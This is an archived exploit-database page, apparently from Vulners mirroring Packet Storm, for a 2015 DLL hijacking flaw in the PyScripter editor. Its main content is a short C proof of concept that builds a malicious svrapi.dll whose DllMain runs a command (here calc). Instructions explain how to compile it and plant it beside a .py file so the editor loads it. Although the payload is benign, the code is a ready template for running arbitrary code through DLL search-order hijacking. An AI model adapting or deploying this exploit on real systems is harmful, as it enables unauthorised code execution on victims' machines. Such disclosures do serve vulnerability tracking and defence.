Lucene search
+L

PyScripter DLL Hijacking

🗓️ 06 Apr 2015 00:00:00Reported by TUNISIAN CYBERType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

PyScripter DLL Hijacking exploit on WinXp/Windows 7 Pro, executing calc.ex

Code
`/*  
#[+] Author: TUNISIAN CYBER  
#[+] Exploit Title: PyScriper DLL Hijacking  
#[+] Date: 05-04-2015  
#[+] Type: Local Exploits  
#[+] Vendor: https://code.google.com/p/pyscripter/  
#[+] Tested on: WinXp/Windows 7 Pro  
#[+] Friendly Sites: sec4ever.com  
#[+] Twitter: @TCYB3R  
#[+] gcc -shared -o svrapi.dll dllhijack.c  
then put svrapi.dll and create a .py file in the same dir, open the .py file , calc.exe execute.  
Proof of Concept (PoC):  
=======================  
*/  
  
#include <windows.h>  
  
int tunisian()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
tunisian();  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
25